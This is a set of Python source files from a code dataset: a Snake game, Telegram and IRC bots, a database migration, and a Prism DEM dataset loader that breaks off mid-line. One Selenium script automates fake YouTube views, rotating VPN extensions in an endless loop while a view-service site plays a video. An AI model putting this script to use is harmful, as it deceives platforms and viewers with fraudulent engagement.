event.key == ord('z') and self.speed != [0,-1]:\n self.key = [0,1]\n elif event.key == pygame.K_DOWN or event.key == ord('s') and self.speed != [0,1]:\n self.key = [0,-1]\n elif event.key == pygame.K_RIGHT or event.key == ord('d') and self.speed != [-1,0]:\n self.key = [1,0]\n elif event.key == pygame.K_LEFT or event.key == ord('q') and self.speed != [1,0]:\n self.key = [-1,0]\n \n elif event.key == ord(\"i\"):\n self.output_handler(1)\n elif event.key == ord(\"j\"):\n self.output_handler(0)\n elif event.key == ord(\"l\"):\n self.output_handler(2)\n \n def output_handler(self, output):\n for key, value in self.output_converter.items():\n if output == key:\n for i in range(4):\n if self.speed == value[i][0]:\n self.key = value[i][1]\n break\n \n def __speed_management(self):\n self.speed = self.key[:]\n \n if self.speed[0] == 1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0] + self.square_size,\n self.snake_pos[0][1],\n ])\n elif self.speed[0] == -1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0] - self.square_size,\n self.snake_pos[0][1],\n ])\n elif self.speed[1] == 1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0],\n self.snake_pos[0][1] - self.square_size,\n ])\n elif self.speed[1] == -1:\n self.snake_pos.insert(0, [\n self.snake_pos[0][0],\n self.snake_pos[0][1] + self.square_size,\n ])\n self.snake_pos.pop(-1)\n \n def __colision_checker(self):\n if self.snake_pos[0][0] == self.food_pos[0][0] and self.snake_pos[0][1] == self.food_pos[0][1]:\n self.score += 1\n self.last_eat = 0\n self.__generate_pos_food()\n\n for tail in self.snake_pos[1:]:\n if self.snake_pos[0] == tail:\n self.alive = False\n \n if self.snake_pos[-1][0] == self.food_pos[-1][0] and self.snake_pos[-1][1] == self.food_pos[-1][1]:\n self.snake_pos.append(self.snake_pos[-1])\n self.food_pos.pop(-1)\n \n if self.snake_pos[0][0] < 0 or self.snake_pos[0][0] > (self.nb_square*self.square_size)-self.square_size:\n self.alive = False\n elif self.snake_pos[0][1] < 0 or self.snake_pos[0][1] > (self.nb_square*self.square_size)-self.square_size:\n self.alive = False\n \n def updater(self):\n self.step += 1\n self.last_eat += 1\n self.__speed_management()\n self.__colision_checker()\n \n def __gfx_updater(self):\n \n self.game_window.fill(pygame.Color(0,0,0))\n \n for body in self.snake_pos:\n pygame.draw.rect(\n self.game_window,\n pygame.Color(255,255,255),\n pygame.Rect(\n body[0], body[1],\n self.square_size, self.square_size,\n ),\n )\n \n pygame.draw.rect(\n self.game_window,\n pygame.Color(255,0,0),\n pygame.Rect(\n self.food_pos[0][0], self.food_pos[0][1],\n self.square_size, self.square_size,\n ),\n )\n \n def __generate_pos_food(self):\n possibilities = np.array(np.meshgrid(\n np.arange(self.nb_square), np.arange(self.nb_square)\n )).T.reshape(-1,2)\n scaled_snakepos = [[\n value[0] // self.square_size,\n value[1] // self.square_size,\n ] for value in self.snake_pos]\n possibilities = np.delete(possibilities, np.where([((value == scaled_snakepos).all(axis=1)).any() for value in possibilities]), axis=0)\n self.food_pos.insert(0, list(\n possibilities[randint(0, possibilities.shape[0]-1)]*self.square_size\n ))\n \n def get_results(self):\n return {'alive':self.alive, 'score':self.score, 'step':self.step, 'last_eat':self.last_eat}\n \n def get_info(self):\n #print(self.food_pos)\n return [\n self.speed,\n [\n self.snake_pos[0][0] // self.square_size,\n self.snake_pos[0][1] // self.square_size,\n ],\n [\n [\n tailpos[0] // self.square_size,\n tailpos[1] // self.square_size, \n ] for tailpos in self.snake_pos[1:]\n ],\n [\n self.food_pos[0][0] // self.square_size,\n self.food_pos[0][1] // self.square_size,\n ],\n self.nb_square,\n ]\n \n def __init__(\n self,\n display_mod: str = False,\n nb_square: int = 20,\n square_size: int = 30,\n refresh_time: int = 10,\n ):\n \n self.nb_square = nb_square\n self.square_size = square_size\n self.refresh_time = refresh_time\n \n self.output_converter = {\n 0: [\n [[0,1], [-1,0]],\n [[0,-1], [1,0]],\n [[1,0], [0,1]],\n [[-1,0], [0,-1]],\n ],\n 1: [\n [[0,1], [0,1]],\n [[0,-1], [0,-1]],\n [[1,0], [1,0]],\n [[-1,0], [-1,0]],\n ],\n 2: [\n [[0,1], [1,0]],\n [[0,-1], [-1,0]],\n [[1,0], [0,-1]],\n [[-1,0], [0,1]],\n ],\n }\n \n self.frame_size = (self.nb_square * self.square_size, self.nb_square * self.square_size)\n self.snake_pos = [[self.nb_square // 2 * self.square_size]*2]\n self.food_pos = []\n self.key, self.speed = [0,1], [0,1]\n self.alive = True\n self.score, self.step, self.last_eat = [0]*3\n self.__generate_pos_food()\n \n if display_mod == \"training\":\n pass\n \n elif display_mod == \"playing\":\n \n errors = pygame.init()\n self.game_window = pygame.display.set_mode(self.frame_size)\n while self.alive:\n self.__event_handler()\n self.updater()\n self.__gfx_updater()\n pygame.display.update()\n pygame.time.Clock().tick(self.refresh_time)\n \n elif display_mod == \"testing\":\n weights = read_last_generation()[0]\n model = NeuralNetwork()\n model.set_weights(weights)\n \n errors = pygame.init()\n self.game_window = pygame.display.set_mode(self.frame_size)\n while self.alive and self.last_eat < 400:\n self.__event_handler()\n \n x = get_input(*self.get_info())\n y = model.predict(x)\n self.output_handler(y.argmax())\n \n self.updater()\n self.__gfx_updater()\n pygame.display.update()\n pygame.time.Clock().tick(self.refresh_time)\n \n else:\n print(\"No Display Mode Set\")\n\nif __name__ == \"__main__\":\n snake = Snake(display_mod=\"testing\", refresh_time=100)","repo_name":"GuyChahine/GeneticNNSnakeWorking","sub_path":"snake_tail.py","file_name":"snake_tail.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42084438246","text":"import logging\n\nfrom typing import Optional\n\n\"\"\"\ndefault hook and boilerplate hook template\nIMPORTANT NOTES:\n - hook function name must be \"run_hook\"\n - payload is a dict containing the record\n\"\"\"\n\nlog = logging.getLogger(__name__)\n\n\ndef run_hook(payload: Optional[dict] = None):\n try:\n # put your code here\n log.info(\"im a stupid hook\")\n except Exception:\n log.error(\"im a stupid broken hook\")","repo_name":"tbotnz/cmdboss","sub_path":"extensibles/hooks/sample_webhook.py","file_name":"sample_webhook.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"11482279921","text":"import random, time\nfrom selenium.common.exceptions import WebDriverException, NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.service import Service\nfrom selenium import webdriver\n\n\ndef connect_to_cyberghost_vpn(driver):\n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1])\n # countrys = ['United States','Romania', 'Germany', 'Netherlands' ]\n countrys = ['United States','Romania', 'Netherlands' ]\n country = countrys[random.randint(0,3)]\n driver.get('chrome-extension://ffbkglfijbcbgblgflchnbphjdllaogb/index.html')\n time.sleep(5)\n # Disconnect if already connected\n connected_btn = driver.find_elements(By.CLASS_NAME, 'dark outer-circle connected')\n connected_btn[0].click() if connected_btn else None\n\n # Select country\n countries_drop_down_btn = driver.find_elements(By.TAG_NAME, 'mat-select-trigger')\n countries_drop_down_btn[0].click() if countries_drop_down_btn else None\n total_option_country = driver.find_elements(By.TAG_NAME, 'mat-option')\n for i in total_option_country:\n i_id = i.get_attribute('id')\n country_text_ele = i.find_element(By.XPATH, f\"//*[@id='{i_id}']/span\")\n country_text = country_text_ele.text\n if country == country_text:\n country_text_ele.click()\n break\n print(f\"VPN connected to {country}\")\n time.sleep(2)\n connect_btn = driver.find_elements(By.CLASS_NAME, 'disconnected')\n connect_btn[0].click() if connect_btn else None\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"Connected to:\"]')))\n except Exception as e:\n print(f\"Error: {e}\")\n # Checking is the VPN connected or not\n error = find_element(driver,'//*[text()=\"connectPage.error\"]')\n if error:\n return False\n # while error:\n # country = countrys[random.randint(0,3)]\n # countries_drop_down_btn = driver.find_elements(By.TAG_NAME, 'mat-select-trigger')\n # countries_drop_down_btn[0].click() if countries_drop_down_btn else None\n # total_option_country = driver.find_elements(By.TAG_NAME, 'mat-option')\n # for i in total_option_country:\n # i_id = i.get_attribute('id')\n # country_text_ele = i.find_element(By.XPATH, f\"//*[@id='{i_id}']/span\")\n # country_text = country_text_ele.text\n # if country == country_text:\n # country_text_ele.click()\n # time.sleep(2)\n # connect_btn = driver.find_elements(By.CLASS_NAME, 'disconnected')\n # connect_btn[0].click() if connect_btn else None\n # error = find_element(driver,'//*[text()=\"connectPage.error\"]')\n \n connected_text = driver.find_elements(By.XPATH, '//*[text()=\"Connected to:\"]')\n if connected_text:\n time.sleep(30)\n disconnect = find_element(driver,'//*[@class=\"dark outer-circle connected\"]')\n disconnect.click()\n return True\n\n \ndef connect_touchvpn(driver):\n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1])\n driver.get('chrome-extension://bihmplhobchoageeokmgbdihknkjbknd/panel/index.html')\n time.sleep(2)\n time.sleep(3)\n country = ['Singapore','Germany','United Kingdom','United States']\n country = random.choice(country)\n time.sleep(1)\n driver.find_element(By.XPATH,'//*[@class=\"location\"]').click()\n time.sleep(3)\n locations = find_element(driver,'//*[@class=\"list\"]')\n time.sleep(1)\n location = find_elements(locations,'//*[@class=\"row\"]')\n location[random.randint(0,7)].click()\n time.sleep(2)\n driver.find_element(By.XPATH,'//*[@id=\"ConnectionButton\"]').click()\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"Stop\"]')))\n except Exception as e:\n print(f\"Error: {e}\")\n connected = driver.find_element(By.XPATH,'//*[text()=\"Stop\"]')\n if connected:\n time.sleep(20)\n connected.click()\n return True\n else:\n return False\n \ndef connect_turbo(driver): \n window_handles = driver.window_handles\n driver.switch_to.window(window_handles[-1]) \n country = ['Singapore','Germany','United Kingdom','United States']\n country = country[random.randint(0,3)]\n # time.sleep(1)\n # window_handles = driver.window_handles\n # time.sleep(1)\n # driver.switch_to.window(window_handles[0])\n time.sleep(1)\n driver.get('chrome-extension://bnlofglpdlboacepdieejiecfbfpmhlb/popup/popup.html')\n time.sleep(2)\n location = find_element(driver,'/html/body/div/div/div[4]/div[1]/div[3]')\n if location:\n location.click()\n time.sleep(5)\n searver_list = find_element(driver,'/html/body/div/div/div[3]/div[1]/div[3]/div[2]/div')\n time.sleep(1)\n countrys = find_elements(searver_list,'.//div')\n countrys[random.randint(0,3)].click()\n wait = WebDriverWait(driver, 10)\n try:\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"CONNECTED\"]')))\n except Exception as e:\n driver.find_element(By.XPATH,'//*[@class=\"start-btn\"]').click()\n wait.until(ec.presence_of_element_located((By.XPATH, '//*[text()=\"CONNECTED\"]')))\n print(f\"Error: {e}\")\n connected = driver.find_element(By.XPATH,'//*[text()=\"CONNECTED\"]')\n if connected:\n return True\n else:\n return False\n\ndef find_element(driver,xpath,locator=By.XPATH,timeout=10):\n wait = WebDriverWait(driver, timeout)\n try:\n ele = wait.until(EC.presence_of_element_located((locator, xpath)))\n return ele\n except NoSuchElementException:\n pass\n except Exception as e:\n pass\n\ndef find_elements(driver, xpath, locator=By.XPATH, timeout=10):\n wait = WebDriverWait(driver, timeout)\n try:\n elements = wait.until(EC.presence_of_all_elements_located((locator, xpath)))\n return elements\n except NoSuchElementException:\n pass\n except Exception as e:\n pass\n \ndef click_popup(driver, element):\n driver.execute_script(\n \"arguments[0].scrollIntoViewIfNeeded();\", element)\n time.sleep(1)\n element.click()\n\ndef play_all_frame(driver):\n iframes = find_elements(driver,'iframe', By.TAG_NAME)\n for i in iframes:\n driver.switch_to.frame(i)\n try:\n driver.find_element(By.CSS_SELECTOR, '[title^=\"Pause (k)\"]')\n except WebDriverException:\n try:\n driver.find_element(\n By.CSS_SELECTOR, 'button.ytp-large-play-button.ytp-button').send_keys(Keys.ENTER)\n except WebDriverException:\n try:\n driver.find_element(\n By.CSS_SELECTOR, '[title^=\"Play (k)\"]').click()\n except WebDriverException:\n try:\n driver.execute_script(\n \"document.querySelector('button.ytp-play-button.ytp-button').click()\")\n except WebDriverException:\n pass\n driver.switch_to.default_content()\n time.sleep(2)\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--mute-audio')\noptions.add_extension(r'./Touch-VPNSecure-and-unlimited-VPN-proxy.crx')\noptions.add_extension(r'./Turbo-VPNSecure-Free-VPN-Proxy.crx')\noptions.add_extension(r'./cyberghost.crx')\ndriver = webdriver.Chrome(options=options)\ndriver.get('https://youtube-views.ytpremium35.repl.co/')\ntext_box = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.ID, 'urlvideo')))\ntext_box.clear()\ntext_box.send_keys('https://www.youtube.com/watch?v=g4FUGtd1piY&ab_channel=armordriller')\nviews = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.ID, 'nbrvideo')))\nviews.clear()\nviews.send_keys('5')\nplay_btn = find_element(driver,'//button[@onclick=\"play();\"]')\nplay_btn.click()\ntime.sleep(10)\nplay_all_frame(driver)\nwhile True:\n for i in range(2):\n if i == 0:\n connect_to_cyberghost_vpn(driver)\n elif i ==1:\n connect_touchvpn(driver)\n else:\n connect_turbo(driver)\n time.sleep(30)\n \nbreakpoint()\n\n\n","repo_name":"riken-khadela/xana-website_viewer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39642329728","text":"\"\"\"adding vgas, vgas0, temperature, ppm, rgain\n\nRevision ID: d7200c24b55c\nRevises: 39a9db1ad708\nCreate Date: 2020-05-24 01:08:43.985390\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd7200c24b55c'\ndown_revision = '39a9db1ad708'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('reading', sa.Column('ppm', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('rgain', sa.Integer(), nullable=True))\n op.add_column('reading', sa.Column('temperature', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('vgas', sa.Float(), nullable=True))\n op.add_column('reading', sa.Column('vgas0', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('reading', 'vgas0')\n op.drop_column('reading', 'vgas')\n op.drop_column('reading', 'temperature')\n op.drop_column('reading', 'rgain')\n op.drop_column('reading', 'ppm')\n # ### end Alembic commands ###\n","repo_name":"androidside/server-pollution-sensor-argon","sub_path":"migrations/versions/d7200c24b55c_adding_vgas_vgas0_temperature_ppm_rgain.py","file_name":"d7200c24b55c_adding_vgas_vgas0_temperature_ppm_rgain.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34929116324","text":"import types\nimport telebot\nimport wikipedia\n\n# ссылка на бота t.me/wikis_new_bot\n\nbot = telebot.TeleBot('')\nglobal lang\nlang = 'ru'\n\n# ====================== comands ====================================\n# Команда /start\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n user_full_name = message.from_user.full_name\n bot.send_message(message.chat.id, F\"Привет, {user_full_name}! Я бот для поиска значения слов. С помощью команды /help вы можете узнать мои возможности\\n Отправьте мне любое слово и я найду его значение в Wikipedia\")\n\n@bot.message_handler(commands=['help'])\ndef help_message(message):\n bot.send_message(message.chat.id, \"Я могу найти значение необходимого вам слова в Wikipedia. По умолчанию я ищу русские слова. Для смены языка введите /change_language\")\n\n@bot.message_handler(commands=['change_language'])\ndef help_message(message):\n markup = language_markup()\n bot.send_message(message.chat.id, text='Выберите язык для поиска слов', reply_markup=markup)\n# ==================================================================\n\n#===================== markup ======================================\n# markup с валютами\ndef language_markup():\n markup = telebot.types.InlineKeyboardMarkup()\n buttons_ru = telebot.types.InlineKeyboardButton(text='Русский', callback_data='ru')\n buttons_en = telebot.types.InlineKeyboardButton(text='Английский', callback_data='en')\n markup.add(buttons_ru,buttons_en)\n return markup\n\n# def yes_or_no_markup():\n# markup = telebot.types.InlineKeyboardMarkup()\n# buttons_y = telebot.types.InlineKeyboardButton(text='Найти значение слова на просторах интернета', callback_data='Yes')\n# markup.add(buttons_y)\n# return markup \n# ==================================================================\n\n# ===================== callbacks ======================================\n@bot.callback_query_handler(func=lambda call: True)\ndef bot_query_handler(call):\n \n global lang\n if (call.data == \"en\"):\n lang = 'en'\n bot.answer_callback_query(callback_query_id=call.id, text=\"Смена языка.....\")\n bot.send_message(call.message.chat.id, 'Язык поиска слов сменился на английский')\n elif (call.data == \"ru\") :\n lang = 'ru'\n bot.answer_callback_query(callback_query_id=call.id, text=\"Смена языка.....\")\n bot.send_message(call.message.chat.id, 'Язык поиска слов сменился на русский')\n # elif (call.data == \"Yes\") :\n # bot.send_message(call.message.chat_id,f\"\"\"\"\"\")\n\n\n# ==================================================================\n\n# Поиск слова\n@bot.message_handler(content_types=['text'])\ndef get_word_message(message):\n try:\n wikipedia.set_lang(lang)\n result = wikipedia.summary(str(message.text))\n web = wikipedia.page(str(message.text))\n \n bot.send_message(message.chat.id, text='Вот что я смог найти:')\n bot.send_message(message.chat.id, result)\n markup = telebot.types.InlineKeyboardMarkup()\n button1 = telebot.types.InlineKeyboardButton(\n text=\"Статья в википедии\", url=str(web.url))\n markup.add(button1)\n bot.send_message(message.chat.id, \"Ссылка на полную статью\", reply_markup=markup)\n except:\n bot.send_message(message.chat.id, text='К сожалению, я не смог найти данное слово в базе Wikipedia')\n markup = telebot.types.InlineKeyboardMarkup()\n button1 = telebot.types.InlineKeyboardButton(\n text=\"Результаты поиска в Яндекс\", url=\"\"\"https://yandex.ru/search/?text=\"\"\"\n + message.text.replace(' ', \"+\") +\n \"\"\"&lr=50&search_source=yaru_desktop_common\"\"\")\n markup.add(button1)\n bot.send_message(\n message.chat.id, \"Можете найти в интернете по ссылке:\", reply_markup=markup)\nbot.infinity_polling()\n\n\n","repo_name":"Chashch-Anya/WikiBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10800109376","text":"from datetime import datetime\nfrom peewee import CharField, TextField, DateTimeField, fn\nfrom whoosh.analysis import StemmingAnalyzer\nimport whoosh.fields\nimport whoosh.index\nimport whoosh.query\nimport whoosh.writing\nfrom whoosh.qparser import QueryParser\n\nfrom ..db import Model, database\n\nfrom ..service import Service\nfrom ..auth import requires_permission\n\nservice = Service(__name__)\n\nstem_ana = StemmingAnalyzer()\n\nWHOOSH_SCHEMA = whoosh.fields.Schema(\n id=whoosh.fields.NUMERIC(unique=True, stored=True),\n quote=whoosh.fields.TEXT(analyzer=stem_ana),\n by=whoosh.fields.ID(),\n ts=whoosh.fields.DATETIME(),\n channel=whoosh.fields.ID(),\n network=whoosh.fields.ID()\n)\n\n\nclass Quote(Model):\n by = CharField(255)\n quote = TextField()\n channel = CharField(255)\n network = CharField(255)\n ts = DateTimeField()\n\n @property\n def as_text(self):\n return \"Quote {id}: {quote}\".format(\n id=self.id,\n quote=self.quote\n )\n\n class Meta:\n indexes = (\n ((\"channel\", \"network\"), False),\n )\n\n\n@service.setup\ndef initialize_model(bot):\n config = service.config_for(bot)\n storage = service.storage_for(bot)\n\n if not whoosh.index.exists_in(config[\"index_path\"]):\n storage.index = whoosh.index.create_in(config[\"index_path\"], WHOOSH_SCHEMA)\n else:\n storage.index = whoosh.index.open_dir(config[\"index_path\"])\n\n storage.quote_qp = QueryParser(\"quote\", schema=WHOOSH_SCHEMA)\n Quote.create_table(True)\n\n\n@service.command(r\"add quote (?P.+)$\", mention=True)\n@service.command(r\"!quote add (?P.+)$\")\n@requires_permission(\"quote\")\ndef add_quote(client, target, origin, quote):\n storage = service.storage_for(client.bot)\n\n with database.transaction():\n quote = Quote.create(by=origin, quote=quote, channel=target,\n network=client.network, ts=datetime.utcnow())\n quote.save()\n\n with storage.index.writer() as writer:\n writer.add_document(id=quote.id, by=quote.by,\n quote=quote.quote, channel=quote.channel,\n network=quote.network, ts=quote.ts)\n\n client.message(target, \"{origin}: Added quote {qid}.\".format(\n origin=origin,\n qid=quote.id\n ))\n\n\n@service.command(r\"[iI](?: am|'m)(?: very| quite| extremely) butthurt about quote (?P\\d+)$\", mention=True)\n@service.command(r\"(?:destroy|remove|delete) quote (?P\\d+)$\", mention=True)\n@service.command(r\"!quote del (?P\\d+)$\")\n@requires_permission(\"quote\")\ndef delete_quote(client, target, origin, qid: int):\n storage = service.storage_for(client.bot)\n\n if not Quote.select() \\\n .where(Quote.id == qid,\n Quote.network == client.network,\n Quote.channel == target).exists():\n client.message(target, \"{origin}: That's not a quote.\".format(\n origin=origin\n ))\n return\n\n with database.transaction():\n Quote.delete().where(Quote.id == qid).execute()\n storage.index.delete_by_term(\"id\", qid)\n\n client.message(target, \"{origin}: Deleted quote {qid}.\".format(\n origin=origin,\n qid=qid\n ))\n\n\n@service.command(r\"what is quote (?P\\d+)\\??$\", mention=True)\n@service.command(r\"read quote (?P\\d+)$\", mention=True)\n@service.command(r\"!quote read (?P\\d+)$\")\ndef read_quote(client, target, origin, qid: int):\n q = Quote.select() \\\n .where(Quote.id == qid,\n Quote.network == client.network,\n Quote.channel == target)\n\n if not q.exists():\n client.message(target, \"{origin}: That's not a quote.\".format(\n origin=origin\n ))\n return\n\n quote = q[0]\n\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quote.as_text\n ))\n\n\n@service.command(r\"(?:give me a )?random quote$\", mention=True)\n@service.command(r\"!quote rand$\")\ndef rand_quote(client, target, origin):\n q = Quote.select() \\\n .where(Quote.network == client.network, Quote.channel == target) \\\n .order_by(fn.Random()) \\\n .limit(1)\n\n if not q.exists():\n client.message(target, \"{origin}: Couldn't find any quotes.\".format(\n origin=origin\n ))\n return\n\n quote = q[0]\n\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quote.as_text\n ))\n\n\n@service.command(r\"find (?:a )?quote matching (?P.+)$\", mention=True)\n@service.command(r\"!quote find (?P.+)$\")\ndef find_quote(client, target, origin, query):\n storage = service.storage_for(client.bot)\n\n q = storage.quote_qp.parse(query)\n\n with storage.index.searcher() as searcher:\n results = searcher.search(q, limit=None)\n qids = [r[\"id\"] for r in results]\n\n quotes = list(Quote.select()\n .where(Quote.network == client.network,\n Quote.channel == target,\n Quote.id << qids))\n\n if not quotes:\n client.message(target, \"{origin}: Couldn't find any quotes.\".format(\n origin=origin\n ))\n elif len(quotes) == 1:\n client.message(target, \"{origin}: {quote}\".format(\n origin=origin,\n quote=quotes[0].as_text\n ))\n else:\n client.message(target, \"{origin}: Found {num} quotes: {qids}\".format(\n origin=origin,\n num=len(qids),\n qids=\", \".join(str(qid) for qid in sorted(qids))\n ))\n","repo_name":"mrvelic/kochira","sub_path":"kochira/services/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3248370316","text":"import numpy as np\nfrom enum import Enum\n\n\nclass NormalDist():\n def __init__(self, mean, variance):\n self.mean = mean\n self.variance = variance\n self.std = np.sqrt(self.variance)\n \n @classmethod\n def generate_random_dist(cls):\n mean = np.random.uniform(-1, 1)\n var = np.random.uniform(0.5, 1.5)\n return cls(mean, var)\n","repo_name":"chieni/dose_allocation","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13243315323","text":"\"\"\"Prism DEM dataset.\"\"\"\nimport gzip\nimport tarfile\nfrom pathlib import Path\nfrom typing import Literal\nfrom typing import Union\nimport numpy as np\nimport xarray as xr\nfrom rasterio.io import MemoryFile\nfrom zampy.datasets import converter\nfrom zampy.datasets import utils\nfrom zampy.datasets import validation\nfrom zampy.datasets.dataset_protocol import SpatialBounds\nfrom zampy.datasets.dataset_protocol import TimeBounds\nfrom zampy.datasets.dataset_protocol import Variable\nfrom zampy.datasets.dataset_protocol import copy_properties_file\nfrom zampy.datasets.dataset_protocol import write_properties_file\nfrom zampy.reference.variables import VARIABLE_REFERENCE_LOOKUP\nfrom zampy.reference.variables import unit_registry\nfrom zampy.utils import regrid\n\n\nVALID_NAME_FILES = [\n Path(__file__).parent / \"assets\" / \"dem_filenames_glo30.txt.gz\",\n Path(__file__).parent / \"assets\" / \"dem_filenames_glo90.txt.gz\",\n]\n\n\n## Ignore missing class/method docstrings: they are implemented in the Dataset class.\n# ruff: noqa: D102\n\n\nclass PrismDEM:\n \"\"\"The Prism Digital Elevation Model.\"\"\"\n\n name: str\n data_url: str\n _glob_code: Literal[\"30\", \"90\"]\n\n # DEM does not change a lot, so use wide valid bounds:\n time_bounds = TimeBounds(np.datetime64(\"1900-01-01\"), np.datetime64(\"2100-12-31\"))\n spatial_bounds = SpatialBounds(90, 180, -90, -180)\n crs = \"EPSG:4326\"\n\n raw_variables = [\n Variable(name=\"elevation\", unit=unit_registry.meter),\n ]\n variable_names = [\"elevation\"]\n variables = [VARIABLE_REFERENCE_LOOKUP[var] for var in variable_names]\n\n license = \"free\"\n bib = \"\"\"\n @misc{2022,\n doi = {10.5270/esa-c5d3d65},\n url = {https://doi.org/10.5270/esa-c5d3d65},\n year = {2022},\n publisher = {European Space Agency},\n author = {European Space Agency and Copernicus},\n title = {Copernicus Prism DEM}\n }\n \"\"\"\n data_url = \"https://spacedata.copernicus.eu/collections/copernicus-digital-elevation-model#anchor\"\n\n def __init__(self) -> None:\n \"\"\"Init.\"\"\"\n pass\n\n def download(\n self,\n download_dir: Path,\n time_bounds: TimeBounds,\n spatial_bounds: SpatialBounds,\n variable_names: list[str],\n overwrite: bool = False,\n ) -> bool:\n validation.validate_download_request(\n self,\n download_dir,\n time_bounds,\n spatial_bounds,\n variable_names,\n )\n\n download_folder = download_dir / self.name\n filenames = get_archive_filenames(spatial_bounds, self._glob_code)\n\n download_folder.mkdir(parents=True, exist_ok=True)\n for fname in filenames:\n utils.download_url(\n url=self.data_url + fname,\n fpath=download_folder / fname,\n overwrite=overwrite,\n )\n\n write_properties_file(\n download_folder, spatial_bounds, time_bounds, variable_names\n )\n\n return True\n\n def ingest(\n self,\n download_dir: Path,\n ingest_dir: Path,\n overwrite: bool = False,\n ) -> bool:\n download_folder = download_dir / self.name\n ingest_folder = ingest_dir / self.name\n ingest_folder.mkdir(parents=True, exist_ok=True)\n\n archive_file_pattern = \"Copernicus_DSM_*_00.tar\"\n archive_files = list(download_folder.glob(archive_file_pattern))\n\n for file in archive_files:\n convert_raw_dem_to_netcdf(\n ingest_folder,\n file=file,\n overwrite=overwrite,\n )\n\n copy_properties_file(download_folder, ingest_folder)\n\n return True\n\n def load(\n self,\n ingest_dir: Path,\n time_bounds: TimeBounds, # Unused in PrismDEM\n spatial_bounds: SpatialBounds,\n resolution: float,\n regrid_method: str,\n variable_names: list[str],\n ) -> xr.Dataset:\n for var in variable_names:\n if var not in self.variable_names:\n msg = (\n \"One or more variables are not in this dataset.\\n\"\n f\"Please check input. Dataset: '{self.name}'\\n\"\n f\"Variables: '{variable_names}'\"\n )\n raise ValueError(msg)\n files = list((ingest_dir / self.name).glob(\"*.nc\"))\n\n def preproc(ds: xr.Dataset) -> xr.Dataset:\n \"\"\"Remove overlapping coordinates on the edges.\"\"\"\n return ds.isel(latitude=slice(None, -1), longitude=slice(None, -1))\n\n ds = xr.open_mfdataset(files, preprocess=preproc)\n ds = regrid.regrid_data(ds, spatial_bounds, resolution, regrid_method)\n\n return ds\n\n def convert(\n self,\n ingest_dir: Path,\n convention: Union[str, Path],\n ) -> bool:\n converter.check_convention(convention)\n ingest_folder = ingest_dir / self.name\n\n data_file_pattern = \"Copernicus_DSM_*_00_DEM.nc\"\n\n data_files = list(ingest_folder.glob(data_file_pattern))\n\n for file in data_files:\n # start conversion process\n print(f\"Start processing file `{file.name}`.\")\n ds = xr.open_dataset(file)\n ds = converter.convert(ds, dataset=self, convention=convention)\n\n return True\n\n\nclass PrismDEM30(PrismDEM):\n \"\"\"The Prism Digital Elevation Model, GLO-30 version.\"\"\"\n\n name = \"prism-dem-30\"\n note = \"Armenia and Azerbaijan are not in this dataset.\"\n\n _glob_code = \"30\"\n\n data_url = \"https://prism-dem-open.copernicus.eu/pd-desk-open-access/prismDownload/COP-DEM_GLO-30-DGED__2021_1/\"\n\n\nclass PrismDEM90(PrismDEM):\n \"\"\"The Prism Digital Elevation Model, GLO-90 version.\"\"\"\n\n name = \"prism-dem-90\"\n\n _glob_code = \"90\"\n\n data_url = \"https://prism-dem-open.copernicus.eu/pd-desk-open-access/prismDownload/COP-DEM_GLO-90-DGED__2021_1/\"\n\n\ndef convert_raw_dem_to_netcdf(\n ingest_folder: Path,\n file: Path,\n overwrite: bool = False,\n) -> None:\n \"\"\"Convert a downloaded archived tiff file to a standard CF/Zampy netCDF file.\n\n Args:\n ingest_folder: Folder where the files have to be written to.\n file: Path to the Prism DEM .tar archive.\n overwrite: Overwrite all existing files. If False, file that already exist will\n be skipped.\n \"\"\"\n ncfile = ingest_folder / file.with_suffix(\".nc\").name\n if ncfile.exists() and not overwrite:\n print(f\"File '{ncfile.name}' already exists, 